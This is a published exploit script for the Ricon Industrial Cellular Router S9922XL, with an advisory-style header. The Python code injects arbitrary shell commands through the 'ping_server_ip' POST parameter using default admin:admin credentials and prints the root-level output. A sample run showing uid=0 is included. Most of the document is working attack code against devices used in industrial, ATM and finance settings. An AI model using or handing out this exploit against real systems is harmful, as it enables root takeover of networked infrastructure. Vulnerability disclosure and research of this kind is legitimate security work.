# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)
# Date: 02.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.riconmobile.com
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
# Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
# WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#
import requests,sys,re
if len(sys.argv)<3:
print("Ricon Industrial Routers RCE")
print("Usage: ./ricon.py [ip] [cmd]")
sys.exit(17)
else:
ipaddr=sys.argv[1]
execmd=sys.argv[2]
data={'submit_class' :'admin',
'submit_button' :'netTest',
'submit_type' :'',
'action' :'Apply',
'change_action' :'',
'is_ping' :'0',
'ping_server_ip':';'+execmd}
htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)